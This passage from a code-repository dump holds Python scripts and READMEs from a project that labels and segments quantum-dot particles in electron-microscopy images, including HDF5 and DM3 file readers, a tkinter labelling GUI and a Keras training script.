(h5py._hl.group.Group): HDF5 dataset handle referencing this dim.\n \n '''\n \n try:\n dset = parent.create_dataset(label, data=dim[0])\n dset.attrs['name'] = np.string_(dim[1])\n dset.attrs['units'] = np.string_(dim[2])\n except:\n raise RuntimeError('Error during writing dim dataset')\n \n return dset\n \n \n def put_emdgroup(self, label, data, dims, parent=None, overwrite=False):\n '''Put an emdtype dataset into the EMD file.\n \n Parameters:\n label (str): Label for the emdtype group containing the dataset.\n data (np.ndarray): Numpy array containing the data.\n dims (tuple): Tuple containing the necessary dims as ((vec, name, units), (vec, name, units), ...)\n parent (h5py._hl.group.Group/None): Parent for the emdtype group, if None it will be written to /data.\n overwrite (bool): Set to force overwriting entry in EMD file.\n \n Returns:\n (h5py._hl.group.Group/None): Group referencing this emdtype dataset or None if failed.\n \n '''\n \n # check input\n if not isinstance(label, str):\n raise TypeError('label needs to be string!')\n \n if not isinstance(data, np.ndarray):\n raise TypeError('data needs to be a numpy.ndarray!')\n \n try:\n assert len(dims) == len(data.shape)\n for i in range(len(dims)):\n assert len(dims[i]) == 3\n assert dims[i][0].shape[0] == data.shape[i]\n except:\n raise TypeError('Something wrong with the provided dims')\n \n # write stuff to HDF5\n \n # create group\n try:\n if parent:\n if label in parent:\n if overwrite:\n print('overwriting \"{}\" in \"{}\"'.format(label, parent.name))\n del parent[label]\n else:\n print('\"{}\" already exists in \"{}\"'.format(label, parent.name))\n raise RuntimeError('\"{}\" already exists in \"{}\"'.format(label, parent.name))\n grp = parent.create_group(label)\n \n else:\n if label in self.data:\n if overwrite:\n print('overwriting \"{}\" in \"{}\"'.format(label, self.data.name))\n del self.data[label]\n else:\n print('\"{}\" already exists in \"{}\"'.format(label, self.data.name))\n raise RuntimeError('\"{}\" already exists in \"{}\"'.format(label, self.data.name))\n\n grp = self.data.create_group(label)\n \n # add attribute\n grp.attrs['emd_group_type'] = 1\n \n # create dataset\n dset = grp.create_dataset('data', data=data)\n \n # create dim datasets\n for i in range(len(dims)):\n self.write_dim('dim{}'.format(i+1), dims[i], grp)\n \n # update emds list\n self.list_emds = self.find_emdgroups(self.file_hdl)\n \n return grp\n \n except:\n print('Something went wrong trying to write the dataset.')\n \n return None\n\n\n def put_comment(self, msg, timestamp=None):\n '''Create a comment in the EMD file.\n \n If timestamp already exists, the msg is appended to existing comment.\n \n Parameters:\n msg (str): String of the message to save.\n timestamp (str/None): Timestamp used as the key, defaults to the current UTC time.\n \n '''\n \n # check input\n if not isinstance(msg, str):\n raise TypeError('msg needs to be a string!')\n \n # create timestamp if missing\n if not timestamp:\n timestamp = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S (UTC)')\n else:\n # try to convert given timestamp to string\n try:\n timestamp = str(timestamp)\n except:\n raise\n \n # write comment\n if timestamp in self.comments.attrs:\n # append to existing\n self.comments.attrs[timestamp] += np.string_('\\n'+msg)\n \n else:\n # create new entry\n self.comments.attrs[timestamp] = np.string_(msg)\n \n\n" }, { "alpha_fraction": 0.5589113235473633, "alphanum_fraction": 0.5854257941246033, "avg_line_length": 39.67856979370117, "blob_id": "08d8ca888b581d4bbdfdb10db14e2cfabcfe6c11", "content_id": "91b122e1278870590220dfe878ffb730cacda574", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5695, "license_type": "no_license", "max_line_length": 129, "num_lines": 140, "path": "/image_processing/timage_v3.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom glob import glob\nfrom ncempy.io import dm\nfrom matplotlib.image import imsave\nfrom matplotlib import cm\nfrom skimage import transform\nfrom skimage import exposure\nfrom ast import literal_eval\nimport shutil\nfrom skimage import io\n\n#Image preprocessing scripts for CNN development\n\ndef xray_correct(image):\n if type(image) is not np.ndarray:\n raise TypeError('Input must be numpy ndarray.')\n image[image<0] = 0\n bad_loc = np.argwhere(image > ((image.mean()+1000)-image.std()))\n for loc in bad_loc:\n if loc[0]+1 > (image.shape[0]-1) or loc[0]-1 < 0 or loc[1]+1 > (image.shape[1]-1) or loc[1] - 1 < 0:\n new_pixel_int = image.mean()+(image.std()*5)\n else:\n neighbor_sum = image[loc[0]-1,loc[1]] + image[loc[0]+1,loc[1]] + image[loc[0],loc[1]-1] + image[loc[0],loc[1]+1]\n new_pixel_int = neighbor_sum /4\n image[loc[0],loc[1]] = new_pixel_int\n return image\n\ndef adjust_pipeline(directory_list):\n i = 0\n for directory in directory_list:\n try:\n os.mkdir(directory+'/adjustedPNG2')\n new_directory = directory+'/adjustedPNG2'\n except:\n new_directory = directory+'/adjustedPNG2'\n dm3s = glob(directory+ '/*.dm3')\n for dm3 in dm3s:\n img = dm.dmReader(dm3)['data']\n if img.shape[0] < 1024:\n pass\n elif img.shape[0] == 2048 and img.shape[1] == 2048:\n img = transform.resize(xray_correct(img),(1024,1024), anti_aliasing = True )\n name = dm3.split('/')[-1].split('.')[0]\n imsave(new_directory+'/'+name+'.png', img, format=\"png\", cmap=cm.gray)\n elif img.shape[0] == 1024 and img.shape[1] == 1024:\n name = dm3.split('/')[-1].split('.')[0]\n imsave(new_directory+'/'+name+'.png', exposure.equalize_adapthist(xray_correct(img)), format=\"png\", cmap=cm.gray)\n i += 1\n print('{} / {} directories complete'.format(i,len(directory_list)))\n print('done!')\n\ndef imm(image):\n fig, ax = plt.subplots(figsize=(10,10))\n ax.imshow(image, cmap = 'gray')\n ax.axis('off')\n\ndef image_slice_small(directory):\n \"\"\"used to break up the 1024x1024 images into 64x64 segments takes a\n diretory that is the source\"\"\"\n image_file_list = glob(directory+'/images/*.png')\n image_new_directory = directory + '/small_sliced_images/'\n if os.path.isdir(image_new_directory) != True:\n os.mkdir(image_new_directory)\n label_file_list = glob(directory+'/labels/*.png')\n label_new_directory = directory + '/small_sliced_labels/'\n if os.path.isdir(label_new_directory) != True:\n os.mkdir(label_new_directory)\n image_name_list = [name.split('/')[-1].split('.')[0] for name in image_file_list]\n label_name_list = [name.split('/')[-1].split('.')[0] for name in label_file_list]\n if len(image_name_list) != len(label_name_list):\n raise RuntimeError('different number of images and labels')\n if image_name_list != label_name_list:\n raise RuntimeError('images and labels did not match')\n for idx, file in enumerate(image_file_list):\n image2split = io.imread(file, as_grey=True)\n label2split = io.imread(label_file_list[idx], as_grey=True)\n for x in range(0,15*64,64):\n for y in range(0,15*64,64):\n image = image2split[x:x+64,y:y+64]\n label = label2split[x:x+64,y:y+64]\n if np.any(np.isin([1],label)) == False:\n pass\n else:\n image_name = image_name_list[idx]+ '_' + str(x)+ str(y) + '.png'\n label_name = image_name_list[idx]+ '_' + str(x)+ str(y) + '.png'\n plt.imsave(image_new_directory+image_name,image, cmap='gray')\n plt.imsave(label_new_directory+label_name,label, cmap='gray')\n print('done!')\n\ndef txt_reader(file):\n txt_info = open(file,'r')\n txt = []\n centers = []\n radii = []\n for line in txt_info:\n if line == '\\n':\n pass\n else:\n line = line.strip('\\n')\n txt.append(line)\n center_stop = txt.index('Radius Size:')\n radius_stop = txt.index('Defect Label:')\n for loc in txt[1:center_stop]:\n centers.append(literal_eval(loc))\n for loc in txt[center_stop+1:radius_stop] :\n radii.append(int(loc))\n image_size = literal_eval(txt[-1])\n return centers, radii, image_size\n\n\ndef spot_maker(location, radius, label_mask):\n for x in np.arange(location[0]-radius,location[0]+radius,1):\n for y in np.arange(location[1]-radius,location[1]+radius,1):\n dx = x - location[0]\n dy = y - location[1]\n if np.sqrt((dx**2+dy**2)) <= radius \\\n and int(x) < label_mask.shape[0] and int(y) < label_mask.shape[1]:\n label_mask[int(y),int(x)] = 1\n return label_mask\n\ndef mask_maker(file):\n centers, radii, image_size = txt_reader(file)\n label_mask = np.zeros(image_size)\n for idx,radius in enumerate(radii):\n label_mask = spot_maker(centers[idx],radius,label_mask)\n return label_mask\n\ndef mask_pipeline(directory):\n file_list = glob(directory+'/text_files/*.txt')\n name_list = [name.split('/')[-1].split('.')[0] for name in file_list]\n for idx, file in enumerate(file_list):\n if len(open(file,'r').readlines()) == 0:\n pass\n else:\n label_mask = mask_maker(file)\n plt.imsave(directory+'/labels/'+name_list[idx]+'.png',label_mask, cmap='gray')\n shutil.move(file,directory+'/old_text_files/')\n print('done!')\n" }, { "alpha_fraction": 0.61712247133255, "alphanum_fraction": 0.7039238810539246, "avg_line_length": 29.035715103149414, "blob_id": "4eb506a3d6d7e10ac1bebd938e8c5f9bff9b28be", "content_id": "c5a6cd5e51a5988d6ef320f94842ab3cd360dc44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 841, "license_type": "no_license", "max_line_length": 161, "num_lines": 28, "path": "/label_data_gui/testing_tkinter_window.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "from tkinter import *\nfrom PIL import Image, ImageTk\n\nwindow = Tk()\nwindow2 = Tk()\n\n#Key down functions\ndef click():\n circle_radius = textentry.get()\n\n#Put in photo\nimage = Image.open('/Users/kategroschner/Box Sync/Research/HR-TEM/20180227/20180227_101729F_prepped20171204/8bit/20180227_101729F_plasma15sec_Mh370kx__0012.tif')\nphoto = ImageTk.PhotoImage(image)\nlabel = Label(window, image = photo).grid(row = 0, column = 0,sticky = W)\n\n#Second window with menus\nlabel2 = Label(window2, text = \"Enter radius of circle:\", font = \"none 12 bold\")\\\n.grid(row = 0, column = 0, sticky = W)\ntextentry = Entry(window2,width = 20, bg = \"blue\")\ntextentry.grid(row = 1, column = 0, sticky = W)\nButton(window2, text = \"Submit\", width = 6, command = click).grid(row = 3, \\\ncolumn = 0, sticky = W)\n\n\n\n#run mainloop \nwindow.mainloop()\nwindow2.mainloop()\n" }, { "alpha_fraction": 0.7067209482192993, "alphanum_fraction": 0.7561099529266357, "avg_line_length": 48.099998474121094, "blob_id": "2ba7fd686c79d864d3d2f0755a61fee17ef1abd9", "content_id": "ddeb6df1a4473dac193a94ef25213088c848c4a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1964, "license_type": "no_license", "max_line_length": 177, "num_lines": 40, "path": "/classfier_builds/encoder3000.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom keras.models import Model\nfrom keras.layers import *\nfrom keras.optimizers import Adam\nfrom keras.utils import to_categorical\nfrom keras import backend as K\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nfrom keras.losses import binary_crossentropy\nfrom keras import metrics\n\ntrainX = np.load('/global/scratch/cgroschner/trainSynthImages.npy')\ntrainY = np.load('/global/scratch/cgroschner/trainSynthMasks.npy')\ntestX = np.load('/global/scratch/cgroschner/testSynthImages.npy')\ntestY = np.load('/global/scratch/cgroschner/testSynthMasks.npy')\ntrainX = trainX.astype('float32')/trainX.max()\ntestX = testX.astype('float32')/testX.max()\ntrainY = np.squeeze(trainY,axis = 4)\ntestY = np.squeeze(testY,axis =4)\n\ninputs = Input((512,512,1))\nzeros = ZeroPadding2D(padding=(8, 8))(inputs)\nconv1 = Conv2D(64,(3,3),padding = 'valid', activation='relu')(zeros)\nconv2 = Conv2D(64,(3,3),padding = 'valid', activation = 'relu')(conv1)\npool1 = MaxPool2D((2,2),padding = 'valid',strides=2)(conv2)\nconv3 = Conv2D(128,(3,3), padding='valid',activation='relu')(pool1)\npool2 = MaxPool2D((2,2),padding='valid',strides = 2)(conv3)\nconv5 = Conv2D(256,(3,3),padding = 'valid',activation='relu')(pool2)\nup1 = UpSampling2D((2,2))(conv5)\nup2 = UpSampling2D((2,2))(up1)\nnorm1 = BatchNormalization()(up2)\nfinal = Conv2D(1,(1,1),activation='softmax')(norm1)\nmodel3 = Model(inputs=inputs,outputs=final)\n\nmodel3.compile(loss='binary_crossentropy', optimizer=Adam(lr=1e-4), metrics=['accuracy'])\ncallbacks_list = [EarlyStopping(monitor='val_acc',patience=1),ModelCheckpoint(filepath='/global/scratch/cgroschner/encoder3000train.h5',monitor ='val_acc', save_best_only=True)]\n\nmodel3.fit(trainX, trainY,batch_size=20,epochs=5,verbose=1,shuffle=True, callbacks=callbacks_list,validation_data=(testX,testY))\nmodel.save('/global/scratch/cgroschner/encoder3000train.h5')\npredY = model.predict(testX,batch_size=10,verbose=1)\nprint(metrics.binary_accuracy(testY, predY))\n" }, { "alpha_fraction": 0.7365319728851318, "alphanum_fraction": 0.7390572428703308, "avg_line_length": 25.977272033691406, "blob_id": "862c9d29f22095cbeb10b74355ce43ade0b0d3c8", "content_id": "33ab00b870bcf514edd46de213cc7232365a1e94", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 194, "num_lines": 44, "path": "/image_processing/ncempy/README.rst", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "------\nncempy\n------\n\nopenNCEM's python package.\n\nStructure\n---------\n\nThe package is given the following structure:\n\n* docs\n Documentation of the `ncempy` package.\n\n* algo\n Algorithms used for image processing and other computing. These act as the machinery of the provided tools. Heavy reusing is encouraged by keeping them general to the processing of datasets.\n\n* eval\n Evaluation routines build from the single algorithms in `algo`. These address specific tasks like evaluating the results from a particular method or experimental setup.\n\n* io\n Module to do file IO for various file formats. While the EMD file format is used internally, other file formats commonly used in electron microscopy are read in using importers.\n\n* test\n Unittests for all modules, functions, lines of code.\n\n\nRequirements\n------------\n\n``ncempy`` is designed and written for python3.5.\n\nIt relies on the following packages:\n* numpy\n* scipy\n* matplotlib (for plotting)\n* h5py (for EMD files)\n\nInstallation\n------------\n\nFor now we support pip installing the ``ncempy`` package from the gitHub repository:\n\n``pip install 'git+https://github.com/ercius/openNCEM.git@development#egg=ncempy'``\n\n" }, { "alpha_fraction": 0.6003291606903076, "alphanum_fraction": 0.6143190264701843, "avg_line_length": 33.88995361328125, "blob_id": "810867adb42b07dc9f349508b4f3654bba51782f", "content_id": "072f48cc575eea7ef92e318c8f2eb9142ec2f780", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7291, "license_type": "no_license", "max_line_length": 163, "num_lines": 209, "path": "/label_data_gui/particle_label_gui_v2.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "# Basic Animation Framework\n\nfrom tkinter import filedialog\nfrom tkinter import *\nfrom PIL import Image, ImageTk\nimport glob\nimport os\nimport numpy as np\n\n\n####################################\n# customize these functions\n####################################\n\n# Adds shapes on mouse clicks and deletes them on pressing 'd'\ndef init(data):\n data.circleCenters = [ ]\n data.recordCircleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.newCircleCenter = [0,0]\n data.imageSize = []\n\ndef getFiles(root):\n directory = filedialog.askdirectory() \n root.update() \n name = \".\"\n path = directory + \"/*.png\"\n print(path) \n files = []\n for fname in glob.glob(path):\n files.append(fname)\n \n return(files, path)\n\ndef imageOpen(files,data):\n image = Image.open(files[data.fileCounter])\n data.imageSize.append(image.size)\n image = image.resize((512,512), Image.BICUBIC) #DONT CHANGE THIS UNLESS YOU CHANGE DEPENDECE OF OUTPUT\n photo = ImageTk.PhotoImage(image)\n return(photo)\n \ndef saveLabel(files,data):\n split = files[data.fileCounter].split(\".\")\n fname = split[0] + \".txt\"\n label_file = open(fname, \"w\")\n label_file.write(\"Particle Location:\\n\")\n for loc in data.recordCircleCenters:\n label_file.write(str(loc)+\"\\n\")\n label_file.write(\"\\n\"+\"Radius Size:\"+\"\\n\")\n for r in data.radii:\n real_r = np.multiply(r,2) #because r is with respect to the 512x512 image not 1024x1024\n label_file.write(str(real_r)+\"\\n\")\n label_file.write(\"\\n\"+\"Defect Label:\"+\"\\n\")\n for label in data.labels:\n label_file.write(label+\"\\n\")\n label_file.write(\"\\n\"+\"Image Size:\"+\"\\n\")\n for size in data.imageSize: #so you can check that the original image was 1024x1024\n label_file.write(str(size)+\"\\n\")\n label_file.close()\n\ndef mousePressed(event, data,canvas):\n data.newCircleCenter = [event.x, event.y]\n recordCircleCenter = [canvas.canvasx(event.x)*2,canvas.canvasy(event.y)*2] #NOTE THE TIMES TWO\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters.append(recordCircleCenter)\n data.radii.append(data.radius)\n data.labels.append('null') #this marks particle as found but not atomic rez\n\ndef keyPressed(event, data,files,root):\n if (event.keysym == \"BackSpace\"):\n if (len(data.circleCenters) > 0):\n data.circleCenters.pop()\n data.recordCircleCenters.pop()\n data.radii.pop()\n data.labels.pop()\n else:\n print(\"No more circles to delete!\")\n if event.char == \"e\": #enlarge circle\n data.radius += 0.5\n data.radii.pop()\n data.radii.append(data.radius)\n if event.char == \"d\": #decrease circle\n data.radius -= 0.5\n data.radii.pop()\n data.radii.append(data.radius)\n if event.keysym == \"Up\": #move circle up\n data.newCircleCenter[1] -= 0.5\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][1] -= 1\n if event.keysym == \"Down\": #move circle down\n data.newCircleCenter[1] += 0.5\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][1] += 1\n if event.keysym == \"Left\": #move circle left\n data.newCircleCenter[0] -= 0.5\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][0] -= 1\n if event.keysym == \"Right\":\n data.newCircleCenter[0] += 0.5\n data.circleCenters.pop()\n data.circleCenters.append(data.newCircleCenter)\n data.recordCircleCenters[-1][0] += 1\n if (event.char == \"y\"): #this means there is a stacking fault\n data.labels.pop()\n data.labels.append('yes')\n if (event.char == \"n\"): #means the particle contained no stacking faults and was atomic rez\n data.labels.pop()\n data.labels.append('no')\n if (event.char == \"o\"): #this marks particle as found but not atomic rez for use if accidently marked\n data.labels.pop()\n data.labels.append('null')\n if event.keysym == \"Return\":\n saveLabel(files,data)\n data.fileCounter += 1\n data.photo = imageOpen(files,data)\n data.circleCenters = [ ]\n data.recordCircleCenters = [ ]\n data.radii = [ ]\n data.labels = [ ]\n data.imageSize = []\n if (event.char == \"q\"):\n quitGui(root)\n\ndef redrawAll(canvas, data):\n #draw the photo\n canvas.create_image(0,0,image = data.photo,anchor = \"nw\")\n # draw the circles\n for idx,circleCenter in enumerate(data.circleCenters):\n if (len(data.radii) > 0):\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radii[idx], cy+data.radii[idx], fill=None, outline = \"magenta\")\n else:\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radius, cy+data.radius, fill=None, outline = \"magenta\")\n # draw the text\n for idx,center in enumerate(data.circleCenters):\n canvas.create_text(center[0], center[1]-(data.radii[idx]+5),activefill = 'magenta',fill = 'black', font = ('Helvetica', '16','bold'),text=data.labels[idx])\n \n\ndef quitGui(root):\n root.destroy()\n####################################\n# use the run function as-is\n####################################\n\ndef run(width=524, height=524):\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n canvas.create_rectangle(0, 0, data.width, data.height,\n fill='white', width=0)\n redrawAll(canvas, data)\n canvas.update() \n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data, canvas)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas,data,files,root):\n keyPressed(event, data,files,root)\n redrawAllWrapper(canvas, data)\n \n \n \n # Set up data and call init\n class Struct(object): pass\n #initialize all the required data\n data = Struct()\n data.width = width\n data.height = height\n data.radius = 20\n data.fileCounter = 0\n init(data)\n \n #Run the file dialog\n int_root = Tk()\n files = getFiles(int_root)[0]\n print(files[0])\n int_root.mainloop()\n\n #run the main image labeling gui\n root = Tk()\n data.photo = imageOpen(files,data)\n #get first image to label\n #files = getFiles()\n #image = Image.open(files[0])\n #image = image.resize((512,512), Image.BICUBIC) #DONT CHANGE THIS\n #photo = ImageTk.PhotoImage(image)\n\n # create the root and the canvas\n canvas = Canvas(width=data.width, height=data.height)\n canvas.create_image(0,0,image = data.photo, anchor = \"nw\")\n canvas.pack()\n # set up events\n root.bind(\"<Button-1>\", lambda event:\n mousePressedWrapper(event, canvas, data))\n root.bind(\"<Key>\", lambda event:\n keyPressedWrapper(event, canvas, data,files,root))\n redrawAll(canvas, data)\n # and launch the app\n\n root.mainloop() # blocks until window is closed\n print(\"bye!\")\n print(data.recordCircleCenters,data.radii, data.labels)\n\nrun(524, 524)" }, { "alpha_fraction": 0.8157894611358643, "alphanum_fraction": 0.8157894611358643, "avg_line_length": 24.33333396911621, "blob_id": "f05c8a9bfe95938fa8ca68e34b28cf026cb390e0", "content_id": "e43f22e30660c5440579b50457218d46439a2894", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 76, "license_type": "no_license", "max_line_length": 52, "num_lines": 3, "path": "/README.md", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "# particleRecognition\n\n- Contains all the work for identifying quantum dots\n" }, { "alpha_fraction": 0.5691424012184143, "alphanum_fraction": 0.5837994813919067, "avg_line_length": 41.157630920410156, "blob_id": "143f08acccc1ae42c2c12c7f4acb82941fee0c8c", "content_id": "599ceb37f5a7181b3f665409f79b163916415dc6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33431, "license_type": "no_license", "max_line_length": 213, "num_lines": 793, "path": "/image_processing/interplot.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "# from ncempy.io import dm\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom glob import glob\nfrom matplotlib.widgets import Slider, Button, RadioButtons\nimport ipywidgets as widgets\n\ndef interplot(image):\n \"\"\"Plots images represented as numpy arrays with a slider bar to contol the range if the image's histogram\"\"\"\n if type(image) != np.ndarray:\n raise RuntimeError('Input must be np.ndarray')\n slider_range = [image.min(),image.max()]\n def imm(image, irange):\n fig, ax = plt.subplots(figsize=(10,10))\n ax.imshow(image, cmap = 'gray', clim = irange)\n ax.axis('off')\n def slide(x):\n imm(image,x)\n x = widgets.IntRangeSlider(value = slider_range,min = slider_range[0],max = slider_range[1],continuous_update = False)\n widgets.interact(slide,x=x)\n\n\ndef open_dm3(dm3FileList, imageNum):\n image = dmReader(dm3FileList[imageNum])\n print(dm3FileList[imageNum])\n return image['data']\n\n\"\"\"\nA module to load data and meta data from DM3 and DM4 files into python.\n\nOn Memory mode:\n The fileDM support and \"on memory\" mode that preoliads the file data in memory\nand data read operations during data parsing are performed against memory. This\nis critical to matain good performance when the file resides in a parallel file\nsystem (PFS) because latency of seek operations PFSs is very high.\n\"\"\"\n\nimport mmap\nfrom os import stat as fileStats\nimport os\nfrom os.path import basename as osBasename\n\nimport numpy as np\n\n\nclass fileDM:\n def __init__(self, filename, verbose = False, on_memory=False):\n '''Init opening the file and reading in the header.\n\n Args:\n filename: string pointing to the filesystem location of the file.\n verbose: if True, debug information is printed.\n on_memory: if True, file data is pre-loaded in memory and all data\n parsing is performed against memory. Use this mode if the file\n is in a network based or paralle file system.\n '''\n\n self.filename = filename\n\n # necessary declarations, if something fails\n self.fid = None\n self.fidOut = None\n\n self._on_memory = on_memory\n\n # check for string\n if not isinstance(filename, str):\n raise TypeError('Filename is supposed to be a string')\n\n #Add a top level variable to indicate verbosee output for debugging\n self.v = verbose\n\n # try opening the file\n try:\n if not self._on_memory:\n self.fid = open(filename, 'rb')\n if self._on_memory:\n self._buffer_offset = 0\n # Pre-load the file as a memory map that supports operations\n # similar to a file.\n with open(filename, 'rb') as _fid:\n if os.name == 'nt':\n self.fid=mmap.mmap(_fid.fileno(), 0,\n access=mmap.ACCESS_READ)\n else:\n self.fid=mmap.mmap(_fid.fileno(), 0,\n prot=mmap.PROT_READ) #, flags=mmap.MAP_PRIVATE)\n self._buffer_size=fileStats(filename).st_size\n\n except IOError:\n print('Error reading file: \"{}\"'.format(filename))\n raise\n except :\n raise\n\n if not self._validDM():\n #print('Not a valid DM3 or DM4 file: \"{}\"'.format(filename))\n raise IOError('Can not read file: {}'.format(filename))\n\n #Lists that will contain information about binary data arrays\n self.xSize = []\n self.ySize = []\n self.zSize = []\n self.zSize2 = [] #only used for 4D datasets in DM4 files\n self.dataType = []\n self.dataSize = []\n self.dataOffset = []\n self.dataShape = [] #1,2,3, or 4. The total number of dimensions in a data set\n\n #The number of objects found in the DM3 file\n self.numObjects = 0\n\n #Indicator that a thumbnail exists (tested for later)\n self.thumbnail = False\n\n self.curGroupLevel = 0 #track how deep we currently are in a group\n self.maxDepth = 64 #maximum number of group levels allowed\n self.curGroupAtLevelX = np.zeros((self.maxDepth,),dtype=np.int8) #track group at current level\n self.curGroupNameAtLevelX = '' #set the name of the root group\n\n self.curTagAtLevelX = np.zeros((self.maxDepth,),dtype=np.int8) #track tag number at the current level\n self.curTagName = '' #string of the current tag\n\n #lists that will contain scale information (pixel size)\n self.scale = []\n self.scaleUnit = []\n self.origin = []\n self.dataType = []\n\n #Temporary variables to keep in case a tag entry shows useful information in an array\n self.scale_temp = 0\n self.origin_temp = 0\n\n self.outputDic = {}\n self.allTags = {}\n\n def __del__(self):\n #close the file\n if(not self._on_memory and self.fid):\n if self.v:\n print('Closing input file: {}'.format(self.filename))\n self.fid.close()\n if(self.fidOut):\n if self.v:\n print('Closing tags output file')\n self.fidOut.close()\n\n def tell(self):\n if self._on_memory:\n return self._buffer_offset\n else:\n return self.fid.tell()\n\n def fromfile(self, *args, **kwargs):\n \"\"\" Reads data from a file or momery map.\n Calls np.fromfile and np.frombuffer depending on the on_memory mode of\n the fileDM.\n\n Args, it supports whatever frombuffer, fromfile support but it requires:\n dtype: np.dtype (object or string) to be read.\n count: number of dtype items to be read.\n\n Returns: A list of count dtype elements.\n \"\"\"\n if self._on_memory:\n if \"dtype\" not in kwargs:\n raise ValueError(\"In on_memory mode, reads require always a\"\n \" named dtype argument to be specified.\")\n if \"count\" not in kwargs:\n raise ValueError(\"In on_memory mode, reads require always a\"\n \" named count argument to be specified.\")\n\n dtype=np.dtype(kwargs[\"dtype\"])\n count=int(kwargs[\"count\"])\n kwargs[\"offset\"]=self._buffer_offset\n self._buffer_offset+=int(dtype.itemsize)*count\n return np.frombuffer(*args, **kwargs)\n else:\n return np.fromfile(*args, **kwargs)\n\n def seek(self, fid, offset, from_what=0):\n \"\"\"Positions the reading head for fid. fid can be a file or memory map.\n Follows the same convention as file.seek\n\n Args:\n fid: file or memory map.\n offset: number of bytes to move the head forward (positive value)\n or backwards (negative value).\n from_what: reference point to use in the head movement. 0:\n for beginning of the file (default behavior), 1: from the\n current head position, and 2: from the end of the file.\n \"\"\"\n if self._on_memory:\n offset=int(offset)\n if from_what==0:\n self._buffer_offset=offset\n elif from_what==1:\n self._buffer_offset+=offset\n elif from_what==2:\n self._buffer_offset=self._buffer_size+offset-1\n else:\n raise ValueError(\"Unkown from_what value: {}\".format(from_what))\n if self._buffer_offset<0:\n raise ValueError(\"Resulting head position cannot be negative.\")\n else:\n return fid.seek(offset, from_what)\n\n\n def _validDM(self):\n '''Test whether a file is a valid DM3 or DM4 file and written in Little Endian format\n '''\n output = True #output will stay == 1 if the file is a true DM4 file\n\n self.dmType = self.fromfile(self.fid,dtype=np.dtype('>u4'),count=1)[0] #file type: == 3 for DM3 or == 4 for DM4\n\n if self.v:\n print('validDM: DM file type numer = {}'.format(self.dmType))\n\n if self.dmType == 3:\n self.specialType = np.dtype('>u4') #uint32\n elif self.dmType == 4:\n self.specialType = np.dtype('>u8') #uint64\n else:\n raise IOError('File is not a valid DM3 or DM4')\n output = False\n\n self.fileSize = self.fromfile(self.fid,dtype=self.specialType,count=1)[0] #file size: real size - 24 bytes\n self.endianType = self.fromfile(self.fid,dtype=np.dtype('>u4'),count=1)[0] #endian type: 1 == little endian (Intel), 2 == big endian (old powerPC Mac)\n\n if self.endianType != 1:\n #print('File is not written Little Endian (PC) format and can not be read by this program.')\n raise IOError('File is not written Little Endian (PC) format and can not be read by this program.')\n output = False\n\n #Test file size for corruption. Note that DM3/DM4 file size is always off by 20/24 bytes from what is written in the header\n osSize = fileStats(self.filename).st_size\n if self.dmType == 3:\n if self.fileSize != osSize-20:\n pass\n #raise IOError('File size on disk ({}) does not match expected file size in header ({}). Invalid file.'.format(osSize, self.fileSize))\n #output = False\n #print('Warning: file size on disk ({}) does not match expected file size in header ({}).'.format(osSize, self.fileSize))\n elif self.dmType == 4:\n if self.fileSize != osSize-24:\n pass\n #raise IOError('File size on disk ({}) does not match expected file size in header ({}). Invalid file.'.format(osSize, self.fileSize))\n #output = False\n #print('Warning: file size on disk ({}) does not match expected file size in header ({}).'.format(osSize, self.fileSize))\n\n return output\n\n def parseHeader(self):\n '''Parse the header by simply reading the root tag group. This ensures the file pointer is in the correct place.\n '''\n #skip the bytes read by dmType\n if self.dmType == 3:\n self.seek(self.fid, 12,0)\n elif self.dmType == 4:\n self.seek(self.fid, 16,0)\n #Read the first root tag the same as any other group\n self._readTagGroup()\n\n #Check for thumbnail\n if(len(self.dataType) > 0): #check that any data set was found\n if( (self.dataType[0] == 23) & (self.dataShape[0] == 2) ):\n self.thumbnail = True\n else:\n self.thumbnail = False\n else: #this file only contains tags (such as a GTG file)\n self.thumbnail = False\n\n def _readTagGroup(self):\n '''Read a tag group in a DM file\n '''\n self.curGroupLevel += 1\n #Check to see if the maximum group level is reached.\n if self.curGroupLevel > self.maxDepth:\n raise IOError('Maximum tag group depth of {} reached. This file is most likely corrupt.'.format(self.maxDepth))\n\n self.curGroupAtLevelX[self.curGroupLevel] = self.curGroupAtLevelX[self.curGroupLevel] + 1\n self.curTagAtLevelX[self.curGroupLevel] = 0\n self.fromfile(self.fid,dtype='<i1',count=2) #is open and is sorted?\n nTags = 